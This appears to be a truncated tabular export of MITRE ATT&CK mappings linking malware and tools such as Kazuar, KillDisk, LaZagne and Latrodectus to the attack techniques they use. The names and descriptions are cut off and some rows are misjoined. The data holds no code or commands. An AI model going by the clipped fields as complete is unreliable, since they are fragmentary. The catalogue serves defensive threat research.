S0356 KONNI malware-- software uses T1059.003Windows Cattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1543.003Windows Se attack-pat technique [KONNI](htt
S1075 KOPILUWAmalware--0software uses T1005 Data from attack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1041 Exfiltratio attack-pat technique [KOPILUWAK]
S1075 KOPILUWAmalware--0software uses T1059.007JavaScript attack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1074.001Local Data attack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1204.002Malicious Fattack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1135 Network Shattack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1057 Process Di attack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1566.001Spearphishattack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1082 System Inf attack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1016 System Netattack-pat technique [KOPILUWAK]
S1075 KOPILUWAmalware--0software uses T1049 System Netattack-pat technique [KOPILUWAK]
S1075 KOPILUWAmalware--0software uses T1033 System Own attack-pat technique [KOPILUWAK
S1075 KOPILUWAmalware--0software uses T1071.001Web Protocattack-pat technique [KOPILUWAK
S0088 Kasidet malware--2software uses T1562.004Disable or attack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1083 File and Di attack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1105 Ingress Tooattack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1056.001Keyloggingattack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1057 Process Di attack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1547.001Registry Ruattack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1113 Screen Capattack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1518.001Security S attack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1082 System Inf attack-pat technique [Kasidet](h
S0088 Kasidet malware--2software uses T1059.003Windows Cattack-pat technique [Kasidet](h
S0265 Kazuar malware-- software uses T1010 Applicatio attack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1102.002Bidirectio attack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1485 Data Destrattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1005 Data from attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1055.001Dynamic-linattack-pat technique If running
S0265 Kazuar malware-- software uses T1008 Fallback C attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1070.004File Deleti attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1071.002File Transf attack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1083 File and Di attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1105 Ingress Tooattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1090.001Internal Prattack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1087.001Local Acco attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1074.001Local Data attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1069.001Local Grouattack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1027 Obfuscatedattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1057 Process Di attack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1547.001Registry Ruattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1029 Scheduled attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1113 Screen Capattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1547.009Shortcut Mattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1132.001Standard Eattack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1082 System Inf attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1016 System Netattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1033 System Own attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1059.004Unix Shell attack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1125 Video Captattack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1071.001Web Protocattack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1059.003Windows Cattack-pat technique [Kazuar](h
S0265 Kazuar malware-- software uses T1047 Windows M attack-pat technique [Kazuar](ht
S0265 Kazuar malware-- software uses T1543.003Windows Se attack-pat technique [Kazuar](ht
S0585 Kerrdown malware--8software uses T1574.002DLL Side-L attack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1140 Deobfuscatattack-pat technique [Kerrdown]
S0585 Kerrdown malware--8software uses T1105 Ingress Tooattack-pat technique [Kerrdown]
S0585 Kerrdown malware--8software uses T1204.002Malicious Fattack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1204.001Malicious Lattack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1027 Obfuscatedattack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1566.001Spearphishattack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1566.002Spearphishattack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1082 System Inf attack-pat technique [Kerrdown](
S0585 Kerrdown malware--8software uses T1059.005Visual Basiattack-pat technique [Kerrdown]
S0487 Kessel malware-- software uses T1560 Archive Coattack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1059 Command attack-pat
an technique [Kessel](ht
S0487 Kessel malware-- software uses T1554 Compromise attack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1030 Data Transfattack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1140 Deobfuscatattack-pat technique [Kessel](h
S0487 Kessel malware-- software uses T1027.013Encrypted/attack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1041 Exfiltratio attack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1048.003Exfiltrati attack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1105 Ingress Tooattack-pat technique [Kessel](h
S0487 Kessel malware-- software uses T1556 Modify Autattack-pat technique [Kessel](h
S0487 Kessel malware-- software uses T1090 Proxy attack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1132.001Standard Eattack-pat technique [Kessel](h
S0487 Kessel malware-- software uses T1082 System Inf attack-pat technique [Kessel](ht
S0487 Kessel malware-- software uses T1016 System Netattack-pat technique [Kessel](ht
S1020 Kevin malware-- software uses T1071.004DNS attack-pat technique Variants o
S1020 Kevin malware-- software uses T1074 Data Stageattack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1030 Data Transfattack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1005 Data from attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1027.013Encrypted/attack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1041 Exfiltratio attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1008 Fallback C attack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1070.004File Deleti attack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1564.003Hidden Wi attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1105 Ingress Tooattack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1001.001Junk Data attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1106 Native API attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1572 Protocol T attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1036.003Rename Sys attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1132.001Standard Eattack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1082 System Inf attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1016 System Netattack-pat technique [Kevin](htt
S1020 Kevin malware-- software uses T1497 Virtualiza attack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1071.001Web Protocattack-pat technique Variants o
S1020 Kevin malware-- software uses T1059.003Windows Cattack-pat technique [Kevin](ht
S1020 Kevin malware-- software uses T1546.003Windows Ma attack-pat technique [Kevin](ht
S0387 KeyBoy malware-- software uses T1555.003Credential attack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1559.002Dynamic Daattack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1027.013Encrypted/attack-pat technique In one vers
S0387 KeyBoy malware-- software uses T1083 File and Di attack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1564.003Hidden Wi attack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1105 Ingress Tooattack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1056.001Keyloggingattack-pat technique [KeyBoy](ht
S0387 KeyBoy malware-- software uses T1059.001PowerShellattack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1001.003Protocol o attack-pat technique [KeyBoy](ht
S0387 KeyBoy malware-- software uses T1059.006Python attack-pat technique [KeyBoy](ht
S0387 KeyBoy malware-- software uses T1113 Screen Capattack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1082 System Inf attack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1016 System Netattack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1070.006Timestompattack-pat technique [KeyBoy](h
S0387 KeyBoy malware-- software uses T1059.005Visual Basiattack-pat technique [KeyBoy](ht
S0387 KeyBoy malware-- software uses T1059.003Windows Cattack-pat technique [KeyBoy](ht
S0387 KeyBoy malware-- software uses T1543.003Windows Se attack-pat technique [KeyBoy](ht
S0387 KeyBoy malware-- software uses T1547.004Winlogon Hattack-pat technique [KeyBoy](h
S0276 Keydnap malware-- software uses T1056.002GUI Input attack-pat technique [Keydnap](h
S0276 Keydnap malware-- software uses T1543.001Launch Ageattack-pat technique [Keydnap](h
S0276 Keydnap malware-- software uses T1090.003Multi-hop attack-pat technique [Keydnap](
S0276 Keydnap malware-- software uses T1059.006Python attack-pat technique [Keydnap](h
S0276 Keydnap malware-- software uses T1564.009Resource Fattack-pat technique [Keydnap](h
S0276 Keydnap malware-- software uses T1555.002Securityd attack-pat technique [Keydnap](
S0276 Keydnap malware-- software uses T1548.001Setuid and attack-pat technique [Keydnap](h
S0276 Keydnap malware-- software uses T1036.006Space afte attack-pat technique [Keydnap](h
S0276 Keydnap malware-- software uses T1071.001Web Protocattack-pat technique [Keydnap](
S0607 KillDisk malware-- software uses T1134 Access Tokattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1070.001Clear Windattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1485 Data Destrattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1486 Data Encryattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1561.002Disk Struc attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1070.004File Deleti attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1083 File and Di attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1036.004Masquerade attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1106 Native API attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1027 Obfuscatedattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1057 Process Di attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1489 Service Stoattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1129 Shared Moattack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1082 System Inf attack-pat technique [KillDisk](
S0607 KillDisk malware-- software uses T1529 System Sh attack-pat technique [KillDisk](
S0599 Kinsing malware--dsoftware uses T1552.003Bash Histo attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1110 Brute Forc attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1496.001Compute Hiattack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1609 Container attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1053.003Cron attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1610 Deploy Conattack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1133 External R attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1083 File and Di attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1105 Ingress Tooattack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1222.002Linux and M attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1552.004Private Keyattack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1057 Process Di attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1018 Remote Sysattack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1021.004SSH attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1059.004Unix Shell attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1078 Valid Acco attack-pat technique [Kinsing](h
S0599 Kinsing malware--dsoftware uses T1071.001Web Protocattack-pat technique [Kinsing](h
S0437 Kivars malware-- software uses T1070.004File Deleti attack-pat technique [Kivars](ht
S0437 Kivars malware-- software uses T1083 File and Di attack-pat technique [Kivars](ht
S0437 Kivars malware-- software uses T1564.003Hidden Wi attack-pat technique [Kivars](ht
S0437 Kivars malware-- software uses T1105 Ingress Tooattack-pat technique [Kivars](ht
S0437 Kivars malware-- software uses T1056.001Keyloggingattack-pat technique [Kivars](ht
S0437 Kivars malware-- software uses T1021 Remote Serattack-pat technique [Kivars](ht
S0437 Kivars malware-- software uses T1113 Screen Capattack-pat technique [Kivars](ht
S0250 Koadic tool--c865 software uses T1573.002Asymmetricattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1548.002Bypass Useattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1115 Clipboard attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1005 Data from attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1055.001Dynamic-linattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1083 File and Di attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1564.003Hidden Wi attack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1105 Ingress Tooattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1218.005Mshta attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1003.003NTDS attack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1046 Network Seattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1135 Network Shattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1059.001PowerShellattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1547.001Registry Ruattack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1218.010Regsvr32 attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1021.001Remote Des attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1218.011Rundll32 attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1053.005Scheduled attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1003.002Security A attack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1569.002Service Ex attack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1082 System Inf attack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1016 System Netattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1033 System Own attack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1059.005Visual Basiattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1071.001Web Protocattack-pat technique [Koadic](h
S0250 Koadic tool--c865 software uses T1059.003Windows Cattack-pat technique [Koadic](ht
S0250 Koadic tool--c865 software uses T1047 Windows M attack-pat technique [Koadic](h
S0641 Kobalos malware-- software uses T1573.002Asymmetricattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1070.003Clear Comm attack-pat technique [Kobalos](
S0641 Kobalos malware-- software uses T1554 Compromise attack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1074 Data Stageattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1140 Deobfuscatattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1048 Exfiltratio attack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1056 Input Capt attack-pat technique [Kobalos](
S0641 Kobalos malware-- software uses T1090.003Multi-hop attack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1027 Obfuscatedattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1573.001Symmetric attack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1082 System Inf attack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1016 System Netattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1070.006Timestompattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1205 Traffic Signattack-pat technique [Kobalos](h
S0641 Kobalos malware-- software uses T1059.004Unix Shell attack-pat technique [Kobalos](
S0162 Komplex malware-- software uses T1070.004File Deleti attack-pat technique The [Komple
S0162 Komplex malware-- software uses T1564.001Hidden Fileattack-pat technique The [Komple
S0162 Komplex malware-- software uses T1543.001Launch Ageattack-pat technique The [Komp
S0162 Komplex malware-- software uses T1057 Process Di attack-pat technique The OsInfo
S0162 Komplex malware-- software uses T1573.001Symmetric attack-pat technique The [Komple
S0162 Komplex malware-- software uses T1033 System Own attack-pat technique The OsInfo
S0162 Komplex malware-- software uses T1071.001Web Protocattack-pat technique The [Kompl
S0236 Kwampirs malware-- software uses T1027.001Binary Padattack-pat technique Before writ
S0236 Kwampirs malware-- software uses T1140 Deobfuscatattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1069.002Domain Grattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1027.013Encrypted/attack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1008 Fallback C attack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1083 File and Di attack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1105 Ingress Tooattack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1087.001Local Acco attack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1069.001Local Grouattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1036.004Masquerade attack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1135 Network Shattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1201 Password Pattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1057 Process Di attack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1018 Remote Sysattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1218.011Rundll32 attack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1021.002SMB/Windo attack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1082 System Inf attack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1016 System Netattack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1049 System Netattack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1033 System Own attack-pat technique [Kwampirs]
S0236 Kwampirs malware-- software uses T1007 System Serattack-pat technique [Kwampirs](
S0236 Kwampirs malware-- software uses T1543.003Windows Se attack-pat technique [Kwampirs]
S1119 LIGHTWIREmalware-- software uses T1554 Compromise attack-pat technique [LIGHTWIRE
S1119 LIGHTWIREmalware-- software uses T1140 Deobfuscatattack-pat technique [LIGHTWIRE
S1119 LIGHTWIREmalware-- software uses T1573.001Symmetric attack-pat technique [LIGHTWIRE
S1119 LIGHTWIREmalware-- software uses T1071.001Web Protocattack-pat technique [LIGHTWIRE
S1119 LIGHTWIREmalware-- software uses T1505.003Web Shell attack-pat technique [LIGHTWIRE
S1121 LITTLELAMmalware-- software uses T1573.002Asymmetricattack-pat technique [LITTLELAM
S1121 LITTLELAMmalware-- software uses T1554 Compromise attack-pat technique [LITTLELAM
S1121 LITTLELAMmalware-- software uses T1543 Create or attack-pat technique [LITTLELAMB
S1121 LITTLELAMmalware-- software uses T1083 File and Di attack-pat technique [LITTLELAM
S1121 LITTLELAMmalware-- software uses T1095 Non-Applicattack-pat technique [LITTLELAM
S1121 LITTLELAMmalware-- software uses T1090 Proxy attack-pat technique [LITTLELAM
S1121 LITTLELAMmalware-- software uses T1082 System Inf attack-pat technique [LITTLELAMB
S0042 LOWBALL malware--2software uses T1102.002Bidirectio attack-pat technique [LOWBALL](
S0042 LOWBALL malware--2software uses T1105 Ingress Tooattack-pat technique [LOWBALL](
S0042 LOWBALL malware--2software uses T1071.001Web Protocattack-pat technique [LOWBALL](
S0349 LaZagne tool--b76bsoftware uses T1003.008/etc/passwattack-pat technique [LaZagne](
S0349 LaZagne tool--b76bsoftware uses T1003.005Cached Dom attack-pat technique [LaZagne](
S0349 LaZagne tool--b76bsoftware uses T1552.001Credentialsattack-pat technique [LaZagne](h
S0349 LaZagne tool--b76bsoftware uses T1555 Credential attack-pat technique [LaZagne](h
S0349 LaZagne tool--b76bsoftware uses T1555.003Credential attack-pat technique [LaZagne](h
S0349 LaZagne tool--b76bsoftware uses T1555.001Keychain attack-pat technique [LaZagne](h
S0349 LaZagne tool--b76bsoftware uses T1003.004LSA Secret attack-pat technique [LaZagne](
S0349 LaZagne tool--b76bsoftware uses T1003.001LSASS Memattack-pat technique [LaZagne](
S0349 LaZagne tool--b76bsoftware uses T1003.007Proc Files attack-pat technique [LaZagne](
S0349 LaZagne tool--b76bsoftware uses T1555.004Windows Cattack-pat technique [LaZagne](h
S1160 Latrodectumalware--7software uses T1027.001Binary Padattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1559.001Componentattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1005 Data from attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1622 Debugger Eattack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1140 Deobfuscatattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1087.002Domain Acattack-pat technique [Latrodect
S1160 Latrodectumalware--7software uses T1069.002Domain Grattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1482 Domain Truattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1027.007Dynamic APattack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1027.013Encrypted/attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1041 Exfiltratio attack-pat technique [Latrodectus](https://attack.m
[Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1070.004File Deleti attack-pat technique
S1160 Latrodectumalware--7software uses T1083 File and Di attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1105 Ingress Tooattack-pat technique [Latrodectu
email campaigns.(Citation: E
S1160 Latrodectumalware--7software uses T1059.007JavaScript attack-pat technique
S1160 Latrodectumalware--7software uses T1204.002Malicious Fattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1204.001Malicious Lattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1036.005Match Legiattack-pat technique [Latrodect
S1160 Latrodectumalware--7software uses T1218.007Msiexec attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1104 Multi-Stag attack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1564.004NTFS File Aattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1106 Native API attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1135 Network Shattack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1057 Process Di attack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1547.001Registry Ruattack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1218.011Rundll32 attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1053.005Scheduled attack-pat technique [Latrodectus](https://attack.m
[Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1518.001Security S attack-pat technique
S1160 Latrodectumalware--7software uses T1027.002Software Pattack-pat technique The [Latrod
S1160 Latrodectumalware--7software uses T1566.001Spearphishattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1566.002Spearphishattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1132.001Standard Eattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1573.001Symmetric attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1497.001System Cheattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1082 System Inf attack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1016 System Netattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1033 System Own attack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1529 System Sh attack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1021.005VNC attack-pat technique [Latrodectus](https://attack.m
S1160 Latrodectumalware--7software uses T1071.001Web Protocattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1102 Web Servicattack-pat technique [Latrodectu
S1160 Latrodectumalware--7software uses T1059.003Windows Cattack-pat technique The [Latrod
S1160 Latrodectumalware--7software uses T1047 Windows M attack-pat technique [Latrodectu
S0395 LightNeuromalware-- software uses T1560 Archive Coattack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1119 Automatedattack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1020 Automatedattack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1005 Data from attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1140 Deobfuscatattack-pat technique [LightNeur
S0395 LightNeuromalware-- software uses T1027.013Encrypted/attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1041 Exfiltratio attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1070.004File Deleti attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1105 Ingress Tooattack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1074.001Local Data attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1071.003Mail Protocattack-pat technique [LightNeur
S0395 LightNeuromalware-- software uses T1036.005Match Legiattack-pat technique [LightNeur
S0395 LightNeuromalware-- software uses T1106 Native API attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1114.002Remote Ema attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1029 Scheduled attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1001.002Steganogr attack-pat technique [LightNeur
S0395 LightNeuromalware-- software uses T1573.001Symmetric attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1082 System Inf attack-pat technique [LightNeur
S0395 LightNeuromalware-- software uses T1016 System Netattack-pat technique [LightNeur
S0395 LightNeuromalware-- software uses T1565.002Transmitteattack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1505.002Transport attack-pat technique [LightNeuro
S0395 LightNeuromalware-- software uses T1059.003Windows Cattack-pat technique [LightNeur
S0211 Linfo malware-- software uses T1005 Data from attack-pat technique [Linfo](htt
S0211 Linfo malware-- software uses T1008 Fallback C attack-pat technique [Linfo](htt
S0211 Linfo malware-- software uses T1070.004File Deleti attack-pat technique [Linfo](htt
S0211 Linfo malware-- software uses T1083 File and Di attack-pat technique [Linfo](htt
S0211 Linfo malware-- software uses T1105 Ingress Tooattack-pat technique [Linfo](ht
S0211 Linfo malware-- software uses T1057 Process Di attack-pat technique [Linfo](htt
S0211 Linfo malware-- software uses T1029 Scheduled attack-pat technique [Linfo](ht
S0211 Linfo malware-- software uses T1082 System Inf attack-pat technique [Linfo](htt
S0211 Linfo malware-- software uses T1059.003Windows Cattack-pat technique [Linfo](htt
S0362 Linux Rabbimalware-- software uses T1132 Data Encodattack-pat technique [Linux Rabb
S0362 Linux Rabbimalware-- software uses T1133 External R attack-pat technique [Linux Rabb
S0362 Linux Rabbimalware-- software uses T1110.003Password Sattack-pat technique [Linux Rabb
S0362 Linux Rabbimalware-- software uses T1033 System Own attack-pat technique [Linux Rabb
S0362 Linux Rabbimalware-- software uses T1546.004Unix Shell attack-pat technique [Linux Rabb
S0362 Linux Rabbimalware-- software uses T1078 Valid Acco attack-pat technique [Linux Rabb
S0513 LiteDuke malware-- software uses T1140 Deobfuscatattack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1070.004File Deleti attack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1105 Ingress Tooattack-pat technique [LiteDuke](
S0513 LiteDuke malware-- software uses T1012 Query Regiattack-pat technique [LiteDuke]
S0513 LiteDuke malware-- software uses T1547.001Registry Ruattack-pat technique [LiteDuke](
